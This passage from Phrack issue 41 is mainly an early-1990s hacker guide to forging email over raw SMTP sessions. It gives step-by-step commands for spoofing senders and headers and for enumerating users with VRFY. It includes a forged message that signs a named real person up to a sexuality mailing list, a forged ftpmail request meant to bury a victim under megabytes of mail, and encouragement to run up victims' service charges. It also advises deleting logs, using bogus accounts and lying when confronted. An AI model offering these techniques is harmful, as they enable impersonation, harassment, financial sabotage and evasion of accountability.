  1489. me what someone can REALLY do with an in-depth understanding of many systems.
  1490.  
  1491.      Suffice to say that they are the creme de la creme, probably the only
  1492. group up to par with DPAK.
  1493.  
  1494.      Oh, and I cannot, I MUST NOT forget to mention The Blade, who is truly a
  1495. legend in his own mind.
  1496.  
  1497.  
  1498.  The Future
  1499.  ~~~~~~~~~~
  1500.      I see the future for hacking/phreaking as pretty bleak.  Big Brother is
  1501. watching.  System Administrators are finally realizing that it is better to
  1502. make your system impenetrable than to prosecute kids (I wish the government
  1503. would realize this).  If you combine these two things, there is not much to
  1504. look forward to.
  1505.  
  1506.  In Closing...
  1507.  ~~~~~~~~~~~~~
  1508.      As for the standard Pro-Phile question (are most of the phreaks and
  1509. hackers that I've met computer geeks?), I have not met any phreakers or
  1510. hackers, so I can't say if they are geeks or not.  From phone conversations,
  1511. some seem like geeks, some don't.
  1512. _______________________________________________________________________________
  1513.                                 ==Phrack Inc.==
  1514.  
  1515.                    Volume Four, Issue Forty-One, File 4 of 13
  1516.  
  1517.                                Network Miscellany
  1518.             *******************************************************
  1519.            <              The POWER of Electronic Mail             >
  1520.             *******************************************************
  1521.                          Compiled from Internet Sources
  1522.  
  1523.                                 by The Racketeer
  1524.                               of The Hellfire Club
  1525.  
  1526.                     Network Miscellany created by Taran King
  1527.  
  1528.  
  1529.      First of all, this guide is more than using fakemail.  It literally
  1530. explains the interfaces used with SMTP in detail enough that you should gain a
  1531. stronger awareness of what is going on across the multitude of networks which
  1532. make up the worldwide e-mail connections.  It also contains my usual crude
  1533. remarks and grim hacker humor (assuming it hasn't again been edited out, but
  1534. I'm somewhat proud of the fact that Phrack heavily edited my "language" in last
  1535. issue's article.  Oh well.).
  1536.  
  1537.      There are two objectives in this file:  first, I will attempt to show that
  1538. by using fakemail and SMTP, you can cause an amazing number of useful, hacker
  1539. related stunts; second, I shall attempt to be the first hacker to ever send a
  1540. piece of electronic mail completely around the world, ushering in a new age of
  1541. computerdom!
  1542.  
  1543.      I suggest that, unless you don't want everyone lynching you, don't try to
  1544. fuck up anything that can't be repaired offhand.  I've experimented with
  1545. fakemail beyond this article and the results were both impressive and
  1546. disastrous.  Therefore, let's examine risks first, and then go onto the good
  1547. stuff.  Basic philosophy -- use your brain if you've got one.
  1548.  
  1549.  
  1550. RISKS:
  1551.  
  1552.      Getting caught doing this can be labeled as computer vandalism; it may
  1553. violate trespassing laws; it probably violates hundreds of NFS, Bitnet and
  1554. private company guidelines and ethics policies; and finally, it will no doubt
  1555. piss someone off to the point of intended revenge.
  1556.  
  1557.      Networks have fairly good tracing abilities.  If you are logged, your host
  1558. may be disconnected due to disciplinary referral by network authorities (I
  1559. don't think this has happened yet).  Your account will almost definitely be
  1560. taken away, and if you are a member of the source or target computer's
  1561. company/organization, you can expect to face some sort of political shit that
  1562. could result in suspension, expulsion, firing, or otherwise getting the short
  1563. end of the stick for awhile.
  1564.  
  1565.      Finally, if the government catches you attempting to vandalize another
  1566. computer system, you will probably get some sort of heavy fine, community
  1567. service, or both.
  1568.  
  1569.      Odds of any of this happening if you are smart:  < 1%.
  1570.  
  1571.  
  1572. PRECAUTIONS SUGGESTED:
  1573.  
  1574.      If you have a bogus computer account (standard issue hacker necessity)
  1575. then for crissake use that.  Don't let "them" know who really is hacking
  1576. around.  (Point of clarification, I refer to "them" an awful lot in RL and in
  1577. philes.  "They" are the boneheadded "do-gooders" who try to blame their own
  1578. lack of productivity or creativity on your committing of pseudo-crimes with a
  1579. computer.  FBI, SS, administrators, accountants, SPA "Don't Copy that Floppy"
  1580. fucks, religious quacks, stupid rednecks, right wing conservative Republican
  1581. activists, pigs, NSA, politicians who still THINK they can control us, city
  1582. officials, judges, lame jurors that think a "hacker" only gets
  1583. slap-in-the-wrist punishments, lobbyists who want to blame their own failed
  1584. software on kids, bankers, investors, and probably every last appalled person
  1585. in Stifino's Italian Restaurant when the Colorado 2600 meeting was held there
  1586. last month.  Enough of the paranoid Illuminati shit, back to the phile.)
  1587.  
  1588.      Make sure that you delete history files, logs, etc. if you have
  1589. access to them.  Try using computers that don't keep logs.  Check /usr/adm,
  1590. /etc/logs to see what logs are kept.
  1591.  
  1592.      If you can avoid using your local host (since you value network
  1593. connections in general), do so.  It can avert suspicion that your host contains
  1594. "hackers."
  1595.  
  1596.  
  1597. IF YOU EVER ARE CONFRONTED:
  1598.  
  1599.      "They must have broken into that account from some other site!"
  1600.  
  1601.      "Hackers?  Around here?  I never check 'who' when I log in."
  1602.  
  1603.      "They could have been super-user -- keep an eye out to see if the scum
  1604.       comes back."
  1605.  
  1606.      "Come on, they are probably making a big deal out of nothing.  What could
  1607.       be in e-mail that would be so bad?"
  1608.  
  1609.      "Just delete the account and the culprit will be in your office tomorrow
  1610.       morning."   (Of course, you used a bogus account.)
  1611.  
  1612.  
  1613. PART ONE:  ELECTRONIC MAIL
  1614.  
  1615.      Basically, electronic mail has become the new medium of choice for
  1616. delivering thoughts in a hurry.  It is faster than the post office, cheaper
  1617. than the post office, doesn't take vacations all the time like the post office,
  1618. and is completely free so it doesn't have unions.
  1619.  
  1620.      Of course, you know all that and would rather spend this time making damn
  1621. sure you know what SMTP is.
  1622.  
  1623.      To my knowledge, a completely accurate SMTP set of protocols hasn't been
  1624. published in any hacker journal.  The original (at least, the first I've seen)
  1625. was published in the Legion of Doom Technical Journals and covered the minimum
  1626. SMTP steps necessary for the program "sendmail," found in a typical Unix
  1627. software package.
  1628.  
  1629.      When you connect a raw socket to a remote SMTP compatible host, your
  1630. computer is expected to give a set of commands which will result in having the
  1631. sender, receiver, and message being transferred.  However, unlike people who
  1632. prefer the speed of compression and security of raw integer data, the folks at
  1633. DARPA decided that SMTP would be pretty close to English.
  1634.  
  1635.      If you are on the Internet, and you wanted to connect to the SMTP server,
  1636. type:
  1637.  
  1638.        telnet <hostname> 25
  1639.  
  1640.      Port 25 is the standard port for SMTP.  I doubt it would be too cool to
  1641. change this, since many mail servers connect to the target hosts directly.
  1642. When you connect, you will get a small hostname identifier for whatever SMTP
  1643. server revision you've got.
  1644.  
  1645. 220 huggies.colorado.edu Sendmail 2.2/2.5 8/01/88 ready at Tue, 25 Aug 91
  1646. 03:14:55 edt
  1647.  
  1648.      Now that you are connected, the computer is waiting for commands.  First
  1649. of all, you are expected to explain which computer you are calling in from.
  1650. This is done with the HELO <host> command.  This can be anything at all, but if
  1651. you fail to give the exact host that you are connecting from, it causes the
  1652. following line to appear on the e-mail message the recipient gets from you:
  1653.  
  1654. Apparently-to:  The Racketeer <rack@lycaeum.hfc.com>
  1655.  
  1656.      Instead of the classic:
  1657.  
  1658. To:  The Racketeer <rack@lycaeum.hfc.com>
  1659.  
  1660.      This is the secret to great fakemail -- the ability to avoid the
  1661. "apparently-to" flag.  Although it is subtle, it is a pain to avoid.  In fact,
  1662. in some places, there are so many "protections" to SMTP that every outside
  1663. e-mail is marked with "Apparently-to."  Hey, their problem.
  1664.  
  1665.      So, go ahead and type the HELO command:
  1666.  
  1667. HELO LYCAEUM.HFC.COM
  1668.  
  1669. The computer replies:
  1670.  
  1671. 250 huggies.colorado.edu Hello LYCAEUM.HFC.COM, pleased to meet you
  1672.  
  1673.     Oh, a warm reception.  Older sendmail software explains with the HELP
  1674. command that the computer doesn't care about HELO commands.  You can check it
  1675. upon login with the command "HELP HELO."
  1676.  
  1677.     Now what you will need to do is tell the computer who is supposed to get
  1678. the letter.  From this point, there are all sorts of possibilities.  First of
  1679. all, the format for the recipient would be:
  1680.  
  1681. RCPT TO: <name@host>
  1682.  
  1683.     And *NOTE*, the "<" and ">" symbols should be present!  Some computers,
  1684. especially sticklers like Prime, won't even accept the letters unless they
  1685. adhere specifically to the protocol!  Now, if you give a local address name,
  1686. such as:
  1687.  
  1688. RCPT TO: <smith>
  1689.  
  1690.     ...then it will treat the mail as if it were sent locally, even though it
  1691. was sent through the Internet.  Giving a computer its own host name is valid,
  1692. although there is a chance that it will claim that the machine you are calling
  1693. from had something to do with it.
  1694.  
  1695. RCPT TO: <smith@thishost>
  1696.  
  1697.     ...will check to see if there is a "smith" at this particular computer.  If
  1698. the computer finds "smith," then it will tell you there is no problem.  If you
  1699. decide to use this computer as a forwarding host (between two other points),
  1700. you can type:
  1701.  
  1702. RCPT TO: <smith@someotherhost>
  1703.  
  1704.      This will cause the mail to be forwarded to someotherhost's SMTP port and
  1705. the letter will no longer be a problem for you.  I'll be using this trick to
  1706. send my letter around the world.
  1707.  
  1708.      Now, after you have given the name of the person who is to receive the
  1709. letter, you have to tell the computer who is sending it.
  1710.  
  1711. MAIL FROM: <rack@lycaeum.hfc.com>      ; Really from
  1712. MAIL FROM: <rack>                      ; Localhost
  1713. MAIL FROM: <rack@osi.mil>              ; Fake -- "3rd party host"
  1714. MAIL FROM: <lycaeum.hfc.com|rack>      ; UUCP Path
  1715.  
  1716.      Essentially, if you claim the letter is from a "3rd party," then the other
  1717. machine will accept it due to UUCP style routing.  This will be explained later
  1718. on.
  1719.  
  1720.      The next step is actually entering the e-mail message.  The first few
  1721. lines of each message consists of the message title, X-Messages, headers,
  1722. Forwarding Lines, etc.  These are completely up to the individual mail program,
  1723. but a few simple standards will be printed later, but first let's run through
  1724. the step-by-step way to send fakemail.  You type anything that isn't preceded
  1725. by a number.
  1726.  
  1727. 220 hal.gnu.ai.mit.edu Sendmail AIX 3.2/UCB 5.64/4.0 ready at Tue, 21 Jul 1992
  1728. 22:15:03 -0400 
  1729. helo lycaeum.hfc.com
  1730. 250 hal.gnu.ai.mit.edu Hello lycaeum.hfc.com, pleased to meet you
  1731. mail from: <rack@lycaeum.hfc.com>
  1732. 250 <rack@lycaeum.hfc.com>... Sender ok
  1733. rcpt to: <phrack@gnu.ai.mit.edu>
  1734. 250 <phrack@gnu.ai.mit.edu>... Recipient ok
  1735. data
  1736. 354 Enter mail, end with "." on a line by itself
  1737. Yo, C.D. -- mind letting me use this account?
  1738. .
  1739. 250 Ok
  1740. quit
  1741.  
  1742.      Now, here are a few more advanced ways of using sendmail.  First of all,
  1743. there is the VRFY command.  You can use this for two basic things:  checking up
  1744. on a single user or checking up on a list of users.  Anyone with basic
  1745. knowledge of ANY of the major computer networks knows that there are mailing
  1746. lists which allow several people to share mail.  You can use the VRFY command
  1747. to view every member on the entire list.
  1748.  
  1749. vrfy phrack 
  1750. 250 Phrack Classic <phrack>
  1751.  
  1752.      Or, to see everyone on a mailing list:
  1753.  
  1754. vrfy phrack-staff-list
  1755. 250 Knight Lightning <kl@stormking.com>
  1756. 250 Dispater <dispater@stormking.com>
  1757.  
  1758.      Note - this isn't the same thing as a LISTSERV -- like the one that
  1759. distributes Phrack.  LISTSERVs themselves are quite powerful tools because they
  1760. allow people to sign on and off of lists without human moderation.  Alias lists
  1761. are a serious problem to moderate effectively.
  1762.  
  1763.      This can be useful to just check to see if an account exists.  It can be
  1764. helpful if you suspect a machine has a hacked finger daemon or something to
  1765. hide the user's identity.  Getting a list of users from mailing lists doesn't
  1766. have a great deal of uses, but if you are trying very hard to learn someone's
  1767. real identity, and you suspect they are signed up to a list, just check for all
  1768. users from that particular host site and see if there are any matches.
  1769.  
  1770.      Finally, there is one last section to e-mail -- the actual message itself.
  1771. In fact, this is the most important area to concentrate on in order to avoid
  1772. the infamous "Apparently-to:" line.  Basically, the data consists of a few
  1773. lines of title information and then the actual message follows.
  1774.  
  1775.      There is a set of guidelines you must follow in order for the quotes to
  1776. appear in correct order.  You won't want to have a space separate your titles
  1777. from your name, for example.  Here is an example of a real e-mail message:
  1778.  
  1779. From: rack@lycaeum.hfc.com
  1780. Received: by dockmaster.ncsc.mil (5.12/3.7) id AA10000; Thu, 6 Feb 92 12:00:00
  1781. Message-Id: <666.AA10000@dockmaster.ncsc.mil>
  1782. To: RMorris@dockmaster.ncsc.mil
  1783. Date: Thu, 06 Feb 92 12:00:00
  1784. Title: *wave* Hello, No Such Agency dude!
  1785.  
  1786. NIST sucks.  Say "hi" to your kid for me from all of us at Phrack!
  1787.  
  1788.     Likewise, if you try to create a message without an information line, your
  1789. message would look something like this:
  1790.  
  1791. From: rack@lycaeum.hfc.com
  1792. Received: by dockmaster.ncsc.mil (5.12/3.7) id AA10000; Thu, 6 Feb 92 12:00:00
  1793. -0500
  1794. Message-Id: <666.AA10000@dockmaster.ncsc.mil>
  1795. Date: Thu, 06 Feb 92 12:00:00
  1796. Apparently-to: RMorris@dockmaster.ncsc.mil
  1797.  
  1798. NIST sucks.  Say "hi" to your kid for me from all of us at Phrack!
  1799.  
  1800.      Basically, this looks pretty obvious that it's fakemail, not because I
  1801. altered the numbers necessarily, but because it doesn't have a title line, it
  1802. doesn't have the "Date:" in the right place, and because the "Apparently-to:"
  1803. designation was on.
  1804.  
  1805.     To create the "realistic" e-mail, you would enter:
  1806.  
  1807. helo lycaeum.hfc.com
  1808. mail from: <rack@lycaeum.hfc.com>
  1809. rcpt to: <RMorris@docmaster.ncsc.mil>
  1810. data
  1811. To:  RMorris@dockmaster.ncsc.mil>
  1812. Date: Thu, 06 Feb 92 12:00:00
  1813. Title: *wave* Hello, No Such Agency dude!
  1814.  
  1815. NIST sucks.  Say "hi" to your kid for me from all of us at Phrack!
  1816. .
  1817.  
  1818.      Notice that, even though you are in "data" mode, you are still giving
  1819. commands to sendmail.  All of the lines can (even if only partially) be altered
  1820. through the data command.  This is perfect for sending good fakemail.  For
  1821. example:
  1822.  
  1823. helo lycaeum.hfc.com
  1824. mail from: <dale@opus.tymnet.com>
  1825. rcpt to: <listserv@brownvm.brown.edu>
  1826. data
  1827. Received: by lycaeum.hfc.com (5.12/3.7) id AA11891; Thu 6 Feb 92 12:00:00
  1828. Message-Id: <230.AA11891@lycaeum.hfc.com>
  1829. To: <listserv@brownvm.brown.edu>
  1830. Date: Thu, 06 Feb 92 12:00:00
  1831. Title:  Ohh, sign me up Puuuleeeze.
  1832.  
  1833. subscribe BISEXU-L Dale "Fist Me" Drew
  1834. .
  1835.  
  1836.      Now, according to this e-mail path, you are telling the other computer
  1837. that you received this letter from OPUS.TYMNET.COM, and it is being forwarded
  1838. by your machine to BROWNVM.BROWN.EDU.  Basically, you are stepping into the
  1839. middle of the line and claiming you've been waiting there all this time.  This
  1840. is a legit method of sending e-mail!
  1841.  
  1842.      Originally, when sendmail was less automated, you had to list every
  1843. computer that your mail had to move between in order for it to arrive.  If you
  1844. were computer ALPHA, you'd have to send e-mail to account "joe" on computer
  1845. GAMMA by this address:
  1846.  
  1847. mail to: <beta!ceti!delta!epsilon!freddy!gamma!joe>
  1848.  
  1849.      Notice that the account name goes last and the host names "lead" up to
  1850. that account.  The e-mail will be routed directly to each machine until it
  1851. finally reaches GAMMA.  This is still required today, especially between
  1852. networks like Internet and Bitnet -- where certain hosts are capable of sending
  1853. mail between networks.  This particular style of sending e-mail is called "UUCP
  1854. Style" routing.
  1855.  
  1856.      Sometimes, hosts will use the forwarding UUCP style mail addresses in case
  1857. the host has no concept of how to deal with a name address.  Your machine
  1858. simply routes the e-mail to a second host which is capable of resolving the
  1859. rest of the name.  Although these machines are going out of style, they still
  1860. exist.
  1861.  
  1862.      The third reasonable case of where e-mail will be routed between hosts is
  1863. when, instead of having each computer waste individual time dealing with each
  1864. piece of e-mail that comes about, the computer gives the mail to a dedicated
  1865. mailserver which will then deliver the mail.  This is quite common all over the
  1866. network -- especially due to the fact that the Internet is only a few T1 lines
  1867. in comparison to the multitude of 9600 and 14.4K baud modems that everyone is
  1868. so protective of people over-using.  Of course, this doesn't cause the address
  1869. to be in UUCP format, but when it reaches the other end of the network, it'll
  1870. be impossible to tell what method the letter used to get sent.
  1871.  
  1872.      Okay, now we can send fairly reasonable electronic fakemail.  This stuff
  1873. can't easily be distinguished between regular e-mail unless you either really
  1874. botched it up (say, sending fakemail between two people on the same machine by
  1875. way of 4 national hosts or something) or really had bad timing.
  1876.  
  1877.      Let's now discuss the POWER of fakemail.  Fakemail itself is basically a
  1878. great way to fool people into thinking you are someone else.  You could try to
  1879. social engineer information out of people on a machine by fakemail, but at the
  1880. same time, why not just hack the root password and use "root" to do it?  This
  1881. way you can get the reply to the mail as well.  It doesn't seem reasonable to
  1882. social engineer anything while you are root either.  Who knows.  Maybe a really
  1883. great opportunity will pop up some day -- but until then, let's forget about
  1884. dealing person-to-person with fakemail, and instead deal with
  1885. person-to-machine.
  1886.  
  1887.      There are many places on the Internet that respond to received electronic
  1888. mail automatically.  You have all of the Archie sites that will respond, all of
  1889. the Internet/Bitnet LISTSERVs, and Bitmail FTP servers.  Actually, there are
  1890. several other servers, too, such as the diplomacy adjudicator.  Unfortunately,
  1891. this isn't anywhere nearly as annoying as what you can do with other servers.
  1892.  
  1893.      First, let's cover LISTSERVs.  As you saw above, I created a fakemail
  1894. message that would sign up Mr. Dale Drew to the BISEXU-L LISTSERV.  This means
  1895. that any of the "netnews" regarding bisexual behavior on the Internet would be
  1896. sent directly to his mailbox.  He would be on this list (which is public and
  1897. accessible by anyone) and likewise be assumed to be a member of the network
  1898. bisexual community.
  1899.  
  1900.      This fakemail message would go all the way to the LISTSERV, it would
  1901. register Mr. Dictator for the BISEXU-L list, >DISCARD< my message, and, because
  1902. it thinks that Dale Drew sent the message, it will go ahead and sign him up to
  1903. receive all the bisexual information on the network.
  1904.  
  1905.      And people wonder why I don't even give out my e-mail address.
  1906.  
  1907.      The complete list of all groups on the Internet is available in the file
  1908. "list_of_lists" which is available almost everywhere so poke around
  1909. wuarchive.wustl.edu or ftp.uu.net until you find it.  You'll notice that there
  1910. are several groups that are quite fanatic and would freak out nearly anybody
  1911. who was suddenly signed up to one.
  1912.  
  1913.      Ever notice how big mega-companies like IBM squelch little people who try
  1914. to make copies of their ideas?  Even though you cannot "patent" an "idea,"
  1915. folks like IBM want you to believe they can.  They send their "brute" squad of
  1916. cheap lawyers to "legal-fee-to-death" small firms.  If you wanted to
  1917. "nickel-and-dime" someone out of existence, try considering the following:
  1918.  
  1919.      CompuServe is now taking electronic mail from the Internet.  This is good.
  1920. CompuServe charges for wasting too much of their drive space with stored
  1921. e-mail.  This is bad.  You can really freak out someone you don't like on
  1922. CompuServe by signing them up to the Dungeons and Dragons list, complete with
  1923. several megabytes of fluff per day.  This is cool.  They will then get charged
  1924. hefty fines by CompuServe.  That is fucked up.  How the hell could they know?
  1925.   
  1926.     CompuServe e-mail addresses are userid@compuserve.com, but as the Internet
  1927. users realize, they can't send commas (",") as e-mail paths.  Therefore, use a
  1928. period in place of every comma.  If your e-mail address was 767,04821 on
  1929. CompuServe then it would be 767.04821 for the Internet. CompuServe tends to
  1930. "chop" most of the message headers that Internet creates out of the mail before
  1931. it reaches the end user.  This makes them particularly vulnerable to fakemail.
  1932.  
  1933.      You'll have to check with your individual pay services, but I believe such
  1934. groups as MCI Mail also have time limitations.  Your typical non-Internet-
  1935. knowing schmuck would never figure out how to sign off of some God-awful fluff
  1936. contained LISTSERV such as the Advanced Dungeons & Dragons list.  The amount of
  1937. damage you could cause in monetary value alone to an account would be
  1938. horrendous.
  1939.  
  1940.      Some groups charge for connection time to the Internet -- admittedly, the
  1941. fees are reasonable -- I've seen the price at about $2 per hour for
  1942. communications.  However, late at night, you could cause massive e-mail traffic
  1943. on some poor sap's line that they might not catch.  They don't have a way to
  1944. shut this off, so they are basically screwed.  Be WARY, though -- this sabotage
  1945. could land you in deep shit.  It isn't actually fraud, but it could be
  1946. considered "unauthorized usage of equipment" and could get you a serious fine.
  1947. However, if you are good enough, you won't get caught and the poor fucks will
  1948. have to pay the fees themselves!
  1949.  
  1950.      Now let's investigate short-term VOLUME damage to an e-mail address.
  1951. There are several anonymous FTP sites that exist out there with a service known
  1952. as BIT FTP.  This means that a user from Bitnet, or one who just has e-mail and
  1953. no other network services, can still download files off of an FTP site.  The
  1954. "help" file on this is stored in Appendix C, regarding the usage of Digital's
  1955. FTP mail server.
  1956.  
  1957.      Basically, if you wanted to fool the FTP Mail Server into bombarding some
  1958. poor slob with an ungodly huge amount of mail, try doing a regular "fakemail"
  1959. on the guy, with the enclosed message packet:
  1960.  
  1961. helo lycaeum.hfc.com
  1962. mail from: <dale@opus.tymnet.com>
  1963. rcpt to: <ftpmail@decwrl.dec.com>
  1964. data
  1965. Received: by lycaeum.hfc.com (5.12/3.7) id AA10992; Fri 9 Oct 92 12:00:00
  1966. Message-Id: <230.AA11891@lycaeum.hfc.com>
  1967. To: <listserv@brownvm.brown.edu>
  1968. Date: Fri, 09 Oct 92 12:00:00
  1969. Title:  Hey, I don't have THAT nifty program!
  1970.  
  1971. reply dale@opus.tymnet.com
  1972. connect wuarchive.wustl.edu anonymous fistme@opus.tymnet.com
  1973. binary
  1974. get mirrors/gnu/gcc-2.3.2.tar.Z
  1975. quit
  1976. .
  1977.  
  1978.         What is particularly nasty about this is that somewhere between 15 and
  1979. 20 megabytes of messages are going to be dumped into this poor guy's account.
  1980. All of the files will be uuencoded and broken down into separate messages!
  1981. Instead of deleting just one file, there will be literally hundreds of messages
  1982. to delete!  Obnoxious!  Nearly impossible to trace, too!
  1983.  
  1984.  
  1985. Part 2:  E-MAIL AROUND THE WORLD
  1986.  
  1987.      Captain Crunch happened to make a telephone call around the world, which
  1988. could have ushered in the age of phreak enlightenment -- after all, he proved
  1989. that, through the telephone, you could "touch someone" anywhere you wanted
  1990. around the world!  Billions of people could be contacted.
  1991.  
  1992.      I undoubtedly pissed off a great number of people trying to do this e-mail
  1993. trick -- having gotten automated complaints from many hosts.  Apparently, every
  1994. country has some form of NSA.  This doesn't surprise me at all, I'm just
  1995. somewhat amazed that entire HOSTS were disconnected during the times I used
  1996. them for routers.  Fortunately, I was able to switch computers faster than they
  1997. were able to disconnect them.
  1998.  
  1999.      In order to send the e-mail, I couldn't send it through a direct path.
  2000. What I had to do was execute UUCP style routing, meaning I told each host in
  2001. the path to send the e-mail to the next host in the path, etc., until the last
  2002. machine was done.  Unfortunately, the first machine I used for sending the
  2003. e-mail had a remarkably efficient router and resolved the fact that the target
  2004. was indeed the destination.  Therefore, I re-altered the path to a machine
  2005. sitting about, oh, two feet away from it.  Those two feet are meaningless in
  2006. this epic journey.
  2007.  
  2008.       The originating host names have been altered as to conceal my identity.
  2009. However, if we ever meet at a Con, I'll probably have the real print-out of the
  2010. results somewhere and you can verify its authenticity.  Regardless, most of
  2011. this same shit will work from just about any typical college campus Internet
  2012. (and even Bitnet) connected machines.
  2013.  
  2014.      In APPENDIX A, I've compiled a list of every foreign country that I could
  2015. locate on the Internet.  I figured it was relatively important to keep with the
  2016. global program and pick a series of hosts to route through that would
  2017. presumably require relatively short hops.  I did this by using this list and
  2018. trial and error (most of this information was procured from the Network
  2019. Information Center, even though they deliberately went way the hell out of
  2020. their way to make it difficult to get computers associated with foreign
  2021. countries).
  2022.  
  2023.      My ultimate choice of a path was:
  2024.  
  2025.      lycaeum.hfc.com           -- Origin, "middle" America.
  2026.      albert.gnu.ai.mit.edu     -- Massachusetts, USA.
  2027.      isgate.is                 -- Iceland
  2028.      chenas.inria.fr           -- France
  2029.      icnucevx.cnuce.cn.it      -- Italy
  2030.      sangram.ncst.ernet.in     -- India
  2031.      waseda-mail.waseda.ac.jp  -- Japan
  2032.      seattleu.edu              -- Seattle
  2033.      inferno.hfc.com           -- Ultimate Destination
  2034.  
  2035.      The e-mail address came out to be:
  2036.  
  2037. isgate.is!chenas.inria.fr!icnucevx.cnuce.cn.it!sangram.ncst.ernet.in!
  2038. waseda-mail.waseda.ac.jp!seattleu.edu!inferno.hfc.com!
  2039. rack@albert.gnu.ai.mit.edu
  2040.  
  2041.      ...meaning, first e-mail albert.gnu.ai.mit.edu, and let it parse the name
  2042. down a line, going to Iceland, then to France, etc. until it finally reaches
  2043. the last host on the list before the name, which is the Inferno, and deposits
  2044. the e-mail at rack@inferno.hfc.com.
  2045.  
  2046.      This takes a LONG time, folks.  Every failure toward the end took on
  2047. average of 8-10 hours before the e-mail was returned to me with the failure
  2048. message. In one case, in fact, the e-mail made it shore to shore and then came
  2049. all the way back because it couldn't resolve the last hostname!  That one made
  2050. it (distance-wise) all the way around the world and half again.
  2051.  
  2052.      Here is the final e-mail that I received (with dates, times, and numbers
  2053.      altered to squelch any attempt to track me):
  2054.  
  2055. Return-Path: <rack@lycaeum.hfc.com>
  2056. Received: from sumax.seattleu.edu [192.48.211.120] by Lyceaum.HFC.Com ; 19 Dec
  2057.         92 16:23:21 MST
  2058. Received: from waseda-mail.waseda.ac.jp by sumax.seattleu.edu with SMTP id
  2059.         AA28431 (5.65a/IDA-1.4.2 for rack@inferno.hfc.com); Sat, 19 Dec 92
  2060.         14:26:01 -0800
  2061. Received: from relay2.UU.NET by waseda-mail.waseda.ac.jp (5.67+1.6W/2.8Wb)
  2062.         id AA28431; Sun, 20 Dec 92 07:24:04 JST
  2063. Return-Path: <rack@lycaeum.hfc.com>
  2064. Received: from uunet.uu.net (via LOCALHOST.UU.NET) by relay2.UU.NET with SMTP 
  2065.         (5.61/UUNET-internet-primary) id AA28431; Sat, 19 Dec 92 17:24:08 -0500
  2066. Received: from sangam.UUCP by uunet.uu.net with UUCP/RMAIL
  2067.         (queueing-rmail) id 182330.3000; Sat, 19 Dec 1992 17:23:30 EST
  2068. Received: by sangam.ncst.ernet.in (4.1/SMI-4.1-MHS-7.0)
  2069.         id AA28431; Sun, 20 Dec 92 03:50:19 IST
  2070. From: rack@lycaeum.hfc.com
  2071. Received: from shakti.ncst.ernet.in by saathi.ncst.ernet.in (5.61/Ultrix3.0-C)
  2072.         id AA28431; Sun, 20 Dec 92 03:52:12 +0530
  2073. Received: from saathi.ncst.ernet.in by shakti.ncst.ernet.in with SMTP
  2074.         (16.6/16.2) id AA09700; Sun, 20 Dec 92 03:51:37 +0530
  2075. Received: by saathi.ncst.ernet.in (5.61/Ultrix3.0-C)
  2076.         id AA28431; Sun, 20 Dec 92 03:52:09 +0530
  2077. Received: by sangam.ncst.ernet.in (4.1/SMI-4.1-MHS-7.0)
  2078.         id AA28431; Sun, 20 Dec 92 03:48:24 IST
  2079. Received: from ICNUCEVX.CNUCE.CNR.IT by relay1.UU.NET with SMTP 
  2080.         (5.61/UUNET-internet-primary) id AA28431; Sat, 19 Dec 92 17:20:23 -0500
  2081. Received: from chenas.inria.fr by ICNUCEVX.CNUCE.CNR.IT (PMDF #2961 ) id
  2082.  <01GSIP122UOW000FBT@ICNUCEVX.CNUCE.CNR.IT>; Sun, 19 Dec 1992 23:14:29 MET
  2083. Received: from isgate.is by chenas.inria.fr (5.65c8d/92.02.29) via Fnet-EUnet
  2084.  id AA28431; Sun, 19 Dec 1992 23:19:58 +0100 (MET)
  2085. Received: from albert.gnu.ai.mit.edu by isgate.is (5.65c8/ISnet/14-10-91); Sat,
  2086.  19 Dec 1992 22:19:50 GMT
  2087. Received: from lycaeum.hfc.com by albert.gnu.ai.mit.edu (5.65/4.0) with
  2088.  SMTP id <AA28431@albert.gnu.ai.mit.edu>; Sat, 19 Dec 92 17:19:36 -0500
  2089. Received: by lycaeum.hfc.com (5.65/4.0) id <AA11368@lycaeum.hfc.com>;
  2090.  Sat, 19 Dec 92 17:19:51 -0501
  2091. Date: 19 Dec 1992 17:19:50 -0500 (EST)
  2092. Subject: Global E-Mail
  2093. To:   rack@inferno.hfc.com
  2094. Message-id: <9212192666.AA11368@lycaeum.hfc.com>
  2095. Mime-Version: 1.0
  2096. Content-Type: text/plain; charset=US-ASCII
  2097. Content-Transfer-Encoding: 7bit
  2098. X-Mailer: ELM [version 2.4 PL5]
  2099. Content-Length: 94
  2100. X-Charset: ASCII
  2101. X-Char-Esc: 29
  2102.  
  2103. This Electronic Mail has been completely around the world!
  2104.  
  2105. (and isn't even a chain letter.)
  2106.  
  2107. ===============================================================================
  2108.  
  2109. APPENDIX A:
  2110.  
  2111. List of Countries on the Internet by Root Domain
  2112.  
  2113. (I tried to get a single mail router in each domain.  The domains that don't
  2114.  have them are unavailable at my security clearance.  The computer is your
  2115.  friend.)
  2116.  
  2117. .AQ        New Zealand   
  2118. .AR        Argentina        atina.ar
  2119. .AT        Austria          pythia.eduz.univie.ac.at
  2120. .BB        Barbados         
  2121. .BE        Belgium          ub4b.buug.be
  2122. .BG        Bulgaria
  2123. .BO        Bolivia          unbol.bo
  2124. .BR        Brazil           fpsp.fapesp.br
  2125. .BS        Bahamas
  2126. .BZ        Belize
  2127. .CA        Canada           cs.ucb.ca
  2128. .CH        Switzerland      switch.ch
  2129. .CL        Chile            uchdcc.uchile.cl
  2130. .CN        China            ica.beijing.canet.cn   
  2131. .CR        Costa Rica       huracan.cr
  2132. .CU        Cuba
  2133. .DE        Germany          deins.informatik.uni-dortmund.de
  2134. .DK        Denmark          dkuug.dk
  2135. .EC        Ecuador          ecuanex.ec
  2136. .EE        Estonia          kbfi.ee
  2137. .EG        Egypt
  2138. .FI        Finland          funet.fi
  2139. .FJ        Fiji
  2140. .FR        France           inria.inria.fr
  2141. .GB        England
  2142. .GR        Greece           csi.forth.gr
  2143. .HK        Hong Kong        hp9000.csc.cuhk.hk
  2144. .HU        Hungary          sztaki.hu
  2145. .IE        Ireland          nova.ucd.ie
  2146. .IL        Israel           relay.huji.ac.il
  2147. .IN        India            shakti.ernet.in
  2148. .IS        Iceland          isgate.is
  2149. .IT        Italy            deccnaf.infn.it
  2150. .JM        Jamaica          
  2151. .JP        Japan            jp-gate.wide.ad.jp
  2152. .KR        South Korea      kum.kaist.ac.kr
  2153. .LK        Sri Lanka        cse.mrt.ac.lk
  2154. .LT        Lithuania        ma-mii.lt.su
  2155. .LV        Latvia           
  2156. .MX        Mexico           mtec1.mty.itesm.mx
  2157. .MY        Malaysia         rangkom.my 
  2158. .NA        Namibia
  2159. .NI        Nicaragua        uni.ni
  2160. .NL        Netherlands      sering.cwi.nl
  2161. .NO        Norway           ifi.uio.no
